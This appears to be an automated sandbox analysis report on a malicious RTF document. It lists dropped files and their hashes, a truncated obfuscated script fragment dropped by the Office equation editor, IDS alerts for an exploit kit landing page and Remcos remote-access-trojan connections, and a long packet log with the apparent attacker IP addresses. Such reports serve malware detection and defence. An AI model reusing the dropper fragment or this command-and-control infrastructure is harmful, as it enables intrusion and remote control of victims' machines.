                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2
                                                                                                                          Entropy (8bit):1.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                          Malicious:false
                                                                                                                          Preview:..
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Preview:1
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Sat Oct 5 11:58:10 2024, length=108417, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1014
                                                                                                                          Entropy (8bit):4.565031464315144
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:8V330zFgXg/XAlCPCHaXPyB40B/5YXX+W7eoWIJicvbl9eI4bDtZ3YilMMEpxRlL:8y/XTKi04XSeWDDv3qs57u
                                                                                                                          MD5:1C9FD9A571F60E7987456EEC88C975C6
                                                                                                                          SHA1:6E2DA571DE82C572A88D29AF25E2BC074B3FD5CA
                                                                                                                          SHA-256:A6C2BE60717C2DC190DBFEE4B10EE0F34D89E24CD4F8F66FA5467FF464FB46F6
                                                                                                                          SHA-512:4BBC0FD2F9348FFB19A121AFF6F0646C736BF95AC9B97D43E13B72C57DB5AA618DCBAA13E6F6417171BBDD35CBC29B05B3366739531CA1298EC974C21922DB94
                                                                                                                          Malicious:false
                                                                                                                          Preview:L..................F.... ...<..r...<..r.....Y;&................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....EYCg..user.8......QK.XEYCg*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....EYFg .MKWBWH~1.RTF..J.......WE..WE.*.........................M.K.W.b.W.H.d.5.N.i...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\MKWbWHd5Ni.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.K.W.b.W.H.d.5.N.i...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.48118198617326
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Hjl+B+j4om4byH+B+j4ov:Hjl+B+j4/H+B+j4y
                                                                                                                          MD5:A232EA63A78F32E43C555622DBD9832A
                                                                                                                          SHA1:AEE94FF7A4E9E565B506DDD502DE23ED9EF00FD7
                                                                                                                          SHA-256:82BA872A5327439F351ED5A6FBC9B712C663D4EAAE9727867A2AF14EC8BC23F3
                                                                                                                          SHA-512:04BACE42CE020A8228FB1D47EB36876DCE19F37DC9C3D4D322C6CB05C1D977CDF4116B901D377D876DFE4151434D68E4F820A099B10C71DD5F2340A43692FAED
                                                                                                                          Malicious:false
                                                                                                                          Preview:[misc]..MKWbWHd5Ni.LNK=0..[folders]..MKWbWHd5Ni.LNK=0..
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):257430
                                                                                                                          Entropy (8bit):3.7519142330021595
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:e4DandRGY8p1BUEEcaN450D2+55dYY/fJtURH52nf:eXdRGYA1BU1s5Q2+XdYY/fJtURH52nf
                                                                                                                          MD5:8913C9EA69CDB14AB028336B7962F8EF
                                                                                                                          SHA1:7304C718BF828ADFFDFB0F605638F33F1E598DF7
                                                                                                                          SHA-256:93F2519B312FC093EC5DF617F08DAE29F9ADF9AF3CE102EAF776B5EAAF6F9513
                                                                                                                          SHA-512:001C4AD09728FC843776875A0336BB047AC428055FA6BF7B9FF29B021422C67AF7F7C82C1FA00C9E415C0D06487CFFC31BD44BEF460C5C66F34B009C442913C4
                                                                                                                          Malicious:true
                                                                                                                          Preview:..A.N.v.K.W.t.W.W.f.Z.T.G.c.z.h.W.f.A.W.k.K.x.c.l.s.L. .=. .".O.k.i.W.W.f.C.f.d.x.L.z.B.e.c.f.G.k.f.W.l.a.A.G.Z.x.".....e.W.L.R.W.L.W.u.W.G.U.J.W.I.f.L.f.U.O.P.l.K.W.j.K.x. .=. .".O.k.o.x.B.h.K.G.z.B.W.r.W.p.K.P.P.C.a.L.L.t.L.C.L.L.".....x.L.e.L.p.R.u.i.U.L.L.i.m.W.q.c.n.U.z.N.U.s.A.b.k.L. .=. .".h.W.O.W.S.P.U.c.p.u.U.L.a.P.b.I.U.f.f.k.P.Z.t.m.k.Z.".....L.i.a.s.O.W.A.N.W.v.i.p.e.r.i.n.a.k.K.L.L.l.N.e.d.i.o.L.j.i.b.K. .=. .".G.i.k.G.B.d.O.B.m.e.W.h.i.k.z.e.K.W.k.o.R.f.l.n.c.O.".....L.L.Z.q.i.H.h.q.t.h.v.C.U.L.m.A.c.e.z.B.B.P.m.c.G.p. .=. .".G.h.W.e.o.j.K.b.i.e.A.N.o.m.r.t.l.h.K.G.W.W.L.b.P.B.".....d.C.C.W.U.G.R.z.U.e.W.L.G.G.h.b.C.G.Q.U.Z.c.L.a.u.i. .=. .".e.v.W.K.j.I.k.L.O.G.L.z.i.S.g.A.z.T.u.K.C.h.p.i.c.W.".....L.B.U.W.k.k.G.c.Z.L.A.g.p.W.r.L.p.b.Z.P.Z.L.K.i.U.o. .=. .".s.n.i.Q.i.o.z.N.n.O.G.N.r.n.Q.z.h.u.L.L.O.p.G.o.c.S.".....i.U.Z.h.l.k.z.i.k.T.t.m.m.K.c.l.b.U.R.t.G.L.i.c.K.z. .=. .".p.K.a.i.i.k.G.L.K.i.W.r.Z.c.o.e.B.c.W.o.R.v.i.K.R.k.".....W.O.m.x.A.q.C.b.C.u.L.L.H.n.z.A.R.N.p.L.W.
                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                          File type:Rich Text Format data, version 1
                                                                                                                          Entropy (8bit):2.4746566217380455
                                                                                                                          TrID:
                                                                                                                          • Rich Text Format (5005/1) 55.56%
                                                                                                                          • Rich Text Format (4004/1) 44.44%
                                                                                                                          File name:MKWbWHd5Ni.rtf
                                                                                                                          File size:108'417 bytes
                                                                                                                          MD5:93f8cd6440e951545875706461d25854
                                                                                                                          SHA1:789028f40f3a78ffcce107c4677e91b75bac0e6d
                                                                                                                          SHA256:297a951d047d377a45195c4a9e3c1c7a3a5b4ac6cc58b8e2c17d3ec7a2f09485
                                                                                                                          SHA512:2020598e9bac37ef10f6a3d1a3b1f9a95d215913bc874fcfebcbe336c4db0b00789264fe80fd9986f752e7b2945fb8b7a08f5e18351645b244c6a5ec9f0aef43
                                                                                                                          SSDEEP:768:P5N0Qcq3DFASA+w0EGmlEKIAAUuHn8vBAu:P5yQcqGj+wv9lEKNAUuHn8p
                                                                                                                          TLSH:ECB32559D38F40A4CF68A377532A0A4846FCB33EB70552B2B4AC97313BADD2D05A657C
                                                                                                                          File Content Preview:{\rtf1..........{\*\nonsaltrrun82014020 \(}.{\948377425?`#`8`%!.3<1.52?<=.#|>!|):`3!5?.5-3[5;./'*4+|*,+<58._82->%&'&?_`)0[^,~?'8_+?:55^/;.##?]3(&].[8/`%]~24?_^,'.'?!9:(??!_-;_#[?=|<,.(5@8^#.~]?<??%[??87#[24?+9??0^$_<&@?.6%~/.'#:-8[%33<9)].2=;-?#<;!?2?.1-.
                                                                                                                          Icon Hash:2764a3aaaeb7bdbf
                                                                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                          000001673hno
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-05T14:58:24.631736+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1151.83.251.11380192.168.2.2249167TCP
                                                                                                                          2024-10-05T14:58:24.631736+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1151.83.251.11380192.168.2.2249167TCP
                                                                                                                          2024-10-05T14:58:27.438823+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224916884.32.44.1391991TCP
                                                                                                                          2024-10-05T14:58:28.694665+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224916984.32.44.1391991TCP
                                                                                                                          2024-10-05T14:58:28.741873+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917084.32.44.1391991TCP
                                                                                                                          2024-10-05T14:58:28.812993+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249172178.237.33.5080TCP
                                                                                                                          2024-10-05T14:58:28.865339+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917184.32.44.1391991TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 5, 2024 14:58:15.047235966 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.052350044 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.052413940 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.052689075 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.057465076 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704265118 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704313993 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704353094 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704387903 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704421997 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704452991 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704488039 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704519987 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704552889 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704591036 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.704677105 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704677105 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.704678059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.709722042 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.709783077 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.709794998 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.709819078 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.709877968 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.709877968 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.710195065 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.808393955 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.808439016 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.808475971 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.808511972 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.808585882 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.808585882 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.808585882 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.808585882 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.813112974 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.813194990 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.813236952 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.813237906 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.813523054 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.813556910 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.813589096 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.813622952 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.818295956 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.818351984 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.818363905 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.818403959 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.818655968 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.818691015 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.818718910 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.818742037 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.823088884 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.823124886 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.823152065 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.823158026 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.823168993 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.823211908 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.823422909 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.823457003 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.823487043 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.823518038 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.827909946 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.827944994 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.827974081 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.828002930 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.828145027 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.828181028 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.828202963 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.828253984 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:15.832626104 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:15.832711935 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088469982 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088514090 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088572979 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088581085 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088582039 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088609934 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088648081 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088663101 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088717937 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088717937 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088721037 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088784933 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088776112 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088828087 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088850021 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088860989 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088879108 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088915110 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088917971 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088948011 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.088963985 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.088983059 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089005947 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089015007 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089025974 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089050055 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089061975 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089082956 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089121103 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089138985 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089154005 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089168072 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089189053 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089207888 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089222908 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089241982 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089266062 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089281082 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089317083 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089327097 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089349985 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089382887 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089401960 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089415073 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089423895 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089448929 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089464903 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089482069 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089514971 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089524031 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089546919 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089551926 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089551926 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089580059 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089601040 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089612007 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089618921 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089643002 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089680910 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089684963 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089685917 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089709997 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089718103 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089744091 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089761019 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089778900 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089811087 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089812994 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089833021 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089843988 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089854002 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089878082 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089893103 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089911938 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089943886 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.089966059 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.089977980 CEST804916551.83.251.113192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:16.090003014 CEST4916580192.168.2.2251.83.251.113
                                                                                                                          Oct 5, 2024 14:58:16.090010881 CEST804916551.83.251.113192.168.2.22
